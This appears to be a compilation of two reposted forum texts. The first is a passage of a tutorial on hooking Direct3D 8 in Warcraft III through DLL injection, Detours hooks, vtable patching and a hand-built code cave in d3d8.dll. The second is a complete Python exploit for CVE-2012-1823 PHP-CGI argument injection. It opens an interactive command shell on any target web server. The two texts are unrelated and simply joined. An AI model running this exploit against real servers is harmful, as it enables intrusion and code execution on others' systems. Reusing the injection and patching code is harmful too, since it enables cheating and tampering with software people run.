hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { char path[MAX_PATH]; char exename[MAX_PATH]; char dllname[MAX_PATH]; // aquire full path to exe: GetModuleFileNameA(0, path, MAX_PATH); // find the position of the last backslash and delete whatever follows // (eg C:\Games\loader.exe becomes C:\Games\) int pos = 0; for (int k = 0; k < strlen(path); k++) { if (path[k] == '\\') { pos = k; } } path[pos+1] = 0; // null-terminate it for strcat // build path to target strcpy_s(exename, path); strcat_s(exename, EXE_NAME); // build path to dll strcpy_s(dllname, path); strcat_s(dllname, DLL_NAME); // launch program: STARTUPINFOA siStartupInfo; PROCESS_INFORMATION piProcessInfo; memset(&siStartupInfo, 0, sizeof(siStartupInfo)); memset(&piProcessInfo, 0, sizeof(piProcessInfo)); siStartupInfo.cb = sizeof(siStartupInfo); if (!CreateProcessA(NULL, exename, 0, 0, false, CREATE_SUSPENDED, 0, 0, &siStartupInfo, &piProcessInfo)) { MessageBoxA(NULL, exename, "Error", MB_OK); } // get the process id for injection DWORD pId = piProcessInfo.dwProcessId; // Inject the dll if (!InjectDLL(pId, dllname)) { MessageBoxA(NULL, "Injection failed", "Error", MB_OK); } ResumeThread(piProcessInfo.hThread); return 0; } Now that we have a loader we need something to actually inject. Add a new win32 dll project and call it dll. First off add another main.cpp to this project. CODE C Language #include <windows.h> #include <detours.h> #pragma comment(lib, "detours.lib") BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { DisableThreadLibraryCalls(hModule); // Apply the hook } } return TRUE; } Hmm ok we know that the game uses LoadLibraryA to access directX. This means that we cannot directly hook Direct3DCreate8 because a) It isnt loaded yet We wouldnt know the address of it What we're going to do is firstly hook the LoadLibraryA function. typedef HMODULE (WINAPI *LoadLibrary_t)(LPCSTR); LoadLibrary_t orig_LoadLibrary; // holds address of original non-detoured function // Our hooked LoadLibrary HMODULE WINAPI LoadLibrary_Hook ( LPCSTR lpFileName ) { HMODULE hM = orig_LoadLibrary( lpFileName ); // keep functionality return hM; } // When the dll loads orig_LoadLibrary = (LoadLibrary_t)DetourFunction((LPBYTE) LoadLibraryA, (LPBYTE) LoadLibrary_Hook ); Ok well for starters you can build the solution, place the 2 output files in your game directory and see if it actually works so far. If it doesnt crash, sweet, we're ready to continue We'll use our hooked function to see when d3d8.dll is actually being loaded. When it does, we can get the address of Direct3DCreate8 and detour that too. During testing I saw that the game loads the dll a few times before carrying on so if you're working on another game that doesn't you can take the counter check out. // Our hooked LoadLibrary HMODULE WINAPI LoadLibrary_Hook ( LPCSTR lpFileName ) { static int hooked = 0; HMODULE hM = orig_LoadLibrary( lpFileName ); if ( strcmp( lpFileName, "d3d8.dll" ) == 0) { hooked++; if (hooked == 3) { // get address of function to hook pDirect3DCreate8 = (PBYTE)GetProcAddress(hM, "Direct3DCreate8"); HookAPI(); } } return hM; } To hook Direct3DCreate8 we will need a few more variables. // globals // Our hook function IDirect3D8* __stdcall hook_Direct3DCreate8(UINT sdkVers); // The original to call typedef IDirect3D8* (__stdcall *Direct3DCreate8_t)(UINT SDKVersion); Direct3DCreate8_t orig_Direct3DCreate8; // Holds address that we get in our LoadLibrary hook (used for detour) PBYTE pDirect3DCreate8; The HookAPI() function looks as follows: void HookAPI() { // simple detour orig_Direct3DCreate8 = (Direct3DCreate8_t)DetourFunction(pDirect3DCreate8, (PBYTE)hook_Direct3DCreate8); } Now we have access to the created IDirect3D object IDirect3D8* __stdcall hook_Direct3DCreate8(UINT sdkVers) { IDirect3D8* pD3d8 = orig_Direct3DCreate8(sdkVers); // real one // Use a vtable hook on CreateDevice to get the device pointer later DWORD* pVtable = GetVtableAddress(pD3d8); HookFunction(pVtable, (void*)&hook_CreateDevice, (void*)&orig_CreateDevice, 15); return pD3d8; } Okay now you might be wondering wtf is going on . Let me explain. An object that has virtual methods is laid out in memory like so (roughly) --Object-- pointer to vtable (4 bytes) member 1 member 2 ... ---------- --VTable-- pointer to method 1 (4 bytes) pointer 2 method 2 (4 bytes) ... ---------- This means that if we have a pointer to an object (all that work up there , we have access to its vtable (which has addresses of all its functions). We can get this pointer with the following code: DWORD* GetVtableAddress(void* pObject) { // The first 4 bytes of the object is a pointer to the vtable: return (DWORD*)*((DWORD*)pObject); } If we have access to the vtable, it should be pretty easy to replace the pointer of any of its virtual functions to point to a hooked function that we define . There is one issue. If you have a C++ class class Foo { virtual void Method1(int a); }; , Method1 has parameters void Method1(Foo* pThis, int a); This is where the this pointer comes from. The compiler inserts that for you. This means that if we want to hook any of IDirect3D8's methods using the vtable we define them with an extra pointer mmkay. In order to hook a function you will need its offset from the base address of the vtable. You can find these offsets online or simply count in the d3d8.h file from the sdk. The vtable is write-protected so we need a few calls to VirtualProtect to overwrite anything. A little function to hook a vtable address: void HookFunction(DWORD* pVtable, void* pHookProc, void* pOldProc, int iIndex) { // Enable writing to the vtable at address we aquired DWORD lpflOldProtect; VirtualProtect((void*)&pVtable[iIndex], sizeof(DWORD), PAGE_READWRITE, &lpflOldProtect); // Store old address if (pOldProc) { *(DWORD*)pOldProc = pVtable[iIndex]; } // Overwrite original address pVtable[iIndex] = (DWORD)pHookProc; // Restore protection VirtualProtect(pVtable, sizeof(DWORD), lpflOldProtect, &lpflOldProtect); } All the pointer dereferencing is way confusing O_O. if you cant follow it just read over it a few times till it makes sense. Anyways, back to what we were trying to do.. We wanted to hook CreateDevice sooo.... lets start with a few more globals // CreateDevice typedef HRESULT (APIENTRY *CreateDevice_t)(IDirect3D8*,UINT,D3DDEVTYPE,HWND,DWORD,D3DPRESENT_PARAMETERS*,IDirect3DDevic e8**); CreateDevice_t orig_CreateDevice; HRESULT APIENTRY hook_CreateDevice(IDirect3D8* pInterface, UINT Adapter,D3DDEVTYPE DeviceType,HWND hFocusWindow,DWORD BehaviorFlags,D3DPRESENT_PARAMETERS* pPresentationParameters,IDirect3DDevice8** ppReturnedDeviceInterface); And the hook proc (note the extra pointer): HRESULT APIENTRY hook_CreateDevice(IDirect3D8* pInterface, UINT Adapter,D3DDEVTYPE DeviceType,HWND hFocusWindow,DWORD BehaviorFlags,D3DPRESENT_PARAMETERS* pPresentationParameters,IDirect3DDevice8** ppReturnedDeviceInterface) { HRESULT ret = orig_CreateDevice(pInterface, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface); // Registers MUST be preserved when doing your own stuff!! __asm pushad // get a pointer to the created device IDirect3DDevice8* d3ddev = *ppReturnedDeviceInterface; // lets log it (format in hex mode to make it easier to work with) char buf[50] = {0}; sprintf_s(buf, sizeof(buf), "pD3ddev: %X", d3ddev); std::ofstream of; of.open("C:\\d3d_log.txt", std::ios::app); // append mode of << buf; of.close(); __asm popad return ret; } PHEW. Done with this part . Now you might be wondering WTF all that trouble was for. Well. We'll get to that ------------------- PART 2 : Making the runtime hook --------------------------------- Lets start with a bit more theory With what we have just done we can hook any of IDirect3DDevice8's methods eg EndScene or DrawIndexedPrimitive in a similar way to hooking CreateDevice. But then we would have to start the game with our loader every time . We need a way of getting the device pointer without any of the hooks we used. This is where I decided to do a bit of code injection Lets get going. Start the game using your loader. Dont exit it, we gonna start debugging. If you can, switch the game to windowed mode (breakpoints dnt f*** up like with fullscreen d3d apps). But we busy with warcraft here remember and it doesnt have that option. O well Alt-tab and check your C: drive. If the hook worked you should have a nice little d3d_log.txt waiting for you . Open it up and copy the address of your d3d device. Mine is 6E7100. Run OllyDbg and attach to war3.exe. Hit alt+e to see a list of executable modules. Look for d3d8.dll. Right click on it and say copy->base. Store this somewhere for later. Detach olly from the process (as in DETACH it, make sure the game does not exit! We are still working). Fire up CheatEngine and manually add the address of your device (eg mine being 6E7100). Right click on it and select Find Out What Accessses this address. Alt-tab in and out of the game. You should have a nice long list of instructions that access your device pointer. We want to find one located in the d3d8.dll module because any other directx8 game will load this as well. Remember that base address you took down? You gonna need it now. Mine was 68B90000. Look for an instruction in the list that looks like it was called from this module. Here is a picture as an example. For sake of the tutorial Il use the one that ive already used in the final dll. On this run it is located at 68BFCBF7. The thing is, this address cannot be hardcoded because it will change whenever d3d8.dll is loaded at a different base address. We can find it every time, though. We just need its OFFSET from the base of the module. Base + Offset = Address. What we do is subtract the base from our address to get the offset. 68BFCBF7 - 68B90000 = 6CBF7 This offset will always stay the same. Weo. What we are going to do now is use this instruction to get the pointer every time. Lets hit a bit more olly. Attach to war3.exe again (make sure you close cheat engine first else olly will puke on you). Hit ctrl+g and paste in the address of your instruction. Hit enter. if all went well you should be here: What we want to do is set up a code cave and steal the address. We need an empty space in the code where we can do our own thing. If you hit ctrl+end you should be at the bottom of the d3d8 module. There are a lot of zeroes here which is perfect for us. Hit ctrl+g and move back to where we were. What we want to do is set up a JMP instruction into empty space and set up our cave. For purpose of the tutorial im going to be jumping to BASE + F3FC5. Hit space on your instruction to assemble the jmp. In this case I have a Hit enter on it to jump to our cave. We have to restore the instructions we overwrote by assembling the jump though. So hit space and fill in the first one. Then the second. The address of our device is currently in EAX so lets put that somewhere where we can find it . 4 bytes above the cave sounds good to me. So we MOV the pointer to an address that we know and JMP back to the next real instruction. Dont run this now, you will get an access violation when trying to write to that address. We will virtualProtect it later. If you press ctrl+a to analyse the code and it doesnt come out scrambled it should all be fine. Hit enter on the jmps to see if they go to the right place. We have ourselves a nice working code cave. If we want to inject this we will need the assembled bytecodes. Start with the jump. select it and press ctrl+insert to binary copy. Save this somewhere. Do the same for the entire cave (make sure to select it all). Phew. Time to code this baby. Create a new win32 dll project and call it d3d. Add another main.cpp When we attach we want to run the code injector and address grabber in a new thread, else the game will hang and never execute the code we want :/ So we have #include <windows.h> BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hModule); CreateThread(0, 0, Patch_StealD3d8Device, 0, 0, 0); } return TRUE; } The code injector routine looks as follows: DWORD WINAPI Patch_StealD3d8Device(LPVOID param) { // Aquire base address of d3d8.dll int base_d3d8 = (int)GetModuleBaseAddress(GetCurrentProcessId(), "d3d8.dll"); // add offsets to get addresses const int addr_jmp = base_d3d8 + 0x00076E33; const int addr_cave = base_d3d8 + 0x000F3FC9; const int addr_value = base_d3d8 + 0x000F3FC5; // The bytecode we got byte jmp[] = "\xE9\x91\xD1\x07"; // last ACTUAL byte is \x00 which works out with a null-terminated string byte cave[] = "\x8B\x06\x8B\x48\x08\x89\x35\xC5\x3F\x0B\x6D\xE9\x5F\x2E\xF8\xFF"; // This null-terminated // buddy is ok because its floating in a sea of zeroes // virtualprotect the addresses for writing DWORD lpflOldProtect; // write jmps VirtualProtect((void*)addr_jmp, sizeof(jmp), PAGE_EXECUTE_READWRITE, &lpflOldProtect); memcpy((void*)addr_jmp, (void*)jmp, sizeof(jmp)); VirtualProtect((void*)addr_jmp, sizeof(jmp), lpflOldProtect, &lpflOldProtect); // write caves VirtualProtect((void*)addr_cave, sizeof(cave), PAGE_EXECUTE_READWRITE, &lpflOldProtect); memcpy((void*)addr_cave, (void*)cave, sizeof(cave)); // modify code to make sure that we store in the right place *(int*)(addr_cave + 7) = addr_value; VirtualProtect((void*)addr_cave, sizeof(cave), lpflOldProtect, &lpflOldProtect); // protect value addr for writing VirtualProtect((void*)addr_value, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &lpflOldProtect); // Wait for the value of the vtable and hook stuff HANDLE hThread = CreateThread(0, 0, HookAPI, 0, 0, 0); WaitForSingleObject(hThread, INFINITE); // restore jmp byte orig[] = {0x8B, 0x06, 0x8B, 0x48, 0x08}; VirtualProtect((void*)addr_jmp, sizeof(orig), PAGE_EXECUTE_READWRITE, &lpflOldProtect); memcpy((void*)addr_jmp, (void*)orig, sizeof(orig)); VirtualProtect((void*)addr_jmp, sizeof(orig), lpflOldProtect, &lpflOldProtect); return 1; } The reason for the *(int*)(addr_cave + 7) = addr_value; is that we cannot have any hardcoded addresses. We write the real address to the right place in the code. We are almost ready to hook . We create a new thread that reads in the address of the device pointer. using that we can use a vtable hook on whichever methods we want // globals DWORD* pVtable; DWORD WINAPI HookAPI(LPVOID param) { // Aquire base address of d3d8.dll int base_d3d8 = (int)GetModuleBaseAddress(GetCurrentProcessId(), "d3d8.dll"); const int addr_value = base_d3d8 + 0x000F3FC5; Sleep(100); // wait for address to get written // protect value addr for reading / writing DWORD lpflOldProtect; VirtualProtect((void*)addr_value, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &lpflOldProtect); // poll the value until it gets written by our cave DWORD result = 0; while (!result) { result = *(DWORD*)addr_value; Sleep(10); } // find the vtable pVtable = GetVtableAddress((void*)result); // APPLY THE HOOK, FINALLY!!! HookFunction(pVtable, (void*)&hook_EndScene, (void*)&orig_EndScene, 35); HookFunction(pVtable, (void*)&hook_DrawIndexedPrimitive, (void*)&orig_DrawIndexedPrimitive, 71); HookFunction(pVtable, (void*)&hook_Present, (void*)&orig_Present, 15); HookFunction(pVtable, (void*)&hook_SetStreamSource, (void*)&orig_SetStreamSource, 83); return 1; } I almost forgot. The code to get the base address of a loaded module was written by Sheep afaik and is as follows: // Project must not be unicode else this will not compile DWORD* GetModuleBaseAddress(DWORD iProcId, char* DLLName) { HANDLE hSnap; // Process snapshot handle. MODULEENTRY32 xModule; // Module information structure. hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, iProcId); // Creates a module // snapshot of the // game process. xModule.dwSize = sizeof(MODULEENTRY32); // Needed for Module32First/Next to work. if (Module32First(hSnap, &xModule)) // Gets the first module. { do { if (strcmp(xModule.szModule, DLLName) == 0) // If this is the module we want... { CloseHandle(hSnap); // Free the handle. return (DWORD*)xModule.modBaseAddr; // return the base address. } } while (Module32Next(hSnap, &xModule)); // Loops through the rest of the modules. } CloseHandle(hSnap); // Free the handle. return 0; // If the result of the function is 0, it didn't find the base address. // i.e.. the dll isn't loaded. } Hooking the functions now is as straightforward as it was to hook CreateDevice earlier. Just as an example to get you going the hook code for EndScene would look like this: // hooks.h #include <d3d8.h> #include <d3dx8.h> //EndScene (offset : 35) typedef HRESULT (APIENTRY *EndScene_t)(IDirect3DDevice8*); HRESULT APIENTRY hook_EndScene(IDirect3DDevice8* pInterface); extern EndScene_t orig_EndScene; // hooks.cpp //Endscene EndScene_t orig_EndScene; HRESULT APIENTRY hook_EndScene(IDirect3DDevice8* pInterface) { __asm pushad // just a check D3DRECT rec = {0, 0, 20, 20}; pInterface->Clear(1, &rec, D3DCLEAR_TARGET, D3DCOLOR_XRGB(255, 0, 0), 0, 0); __asm popad return orig_EndScene(pInterface); } And viola, we have a working runtime hook I used text instead of the Clear but whatever Conclusion There is a slight issue with this code and that is the code injection. I dont know if those offsets will work with other installs of directx. I doubt it though :/ lol. One could probably redistribute the correct d3d8.dll with the hook or something . Il attach it and the final release build if any1 wants to test it on a dx8 game . Ive run it on warcraft and ut2004 (which used dx8??) and it worked both times . Writing this has really taken a while and raped my fingers but im glad I can finally share something. Ive learnt a lot doing this and I hope reading it has taught you something new as well Thanks to everyone who has helped me on this and who's code I have used or tutorials i have followed illuz1oN Bobbysing (Gamedeception) xXx (http://paste.lisp.or...splay/58743/raw) Uranium-239 Darawk Sheep COPYRIGHT: Please do not copy this without written permission from me, only link to it. Sursa: Run-time directx hooking using code injection and vtable - rohitab.com - Forums

PHP-CGI Argument Injection Remote Code Execution #!/usr/bin/python import requests import sys print """ CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution This exploit abuses an arguement injection in the PHP-CGI wrapper to execute code as the PHP user/webserver user. Feel free to give me abuse about this <3 - infodox | insecurety.net | @info_dox """ if len(sys.argv) != 2: print "Usage: ./cve-2012-1823.py <target>" sys.exit(0) target = sys.argv[1] url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input""" lol = """<?php system('""" lol2 = """');die(); ?>""" print "[+] Connecting and spawning a shell..." while True: try: bobcat = raw_input("%s:~$ " %(target)) lulz = lol + bobcat + lol2 hax = requests.post(url, lulz) print hax.text except KeyboardInterrupt: print "\n[-] Quitting" sys.exit(1) Sursa: PHP-CGI Argument Injection Remote Code Execution - CXSecurity WLB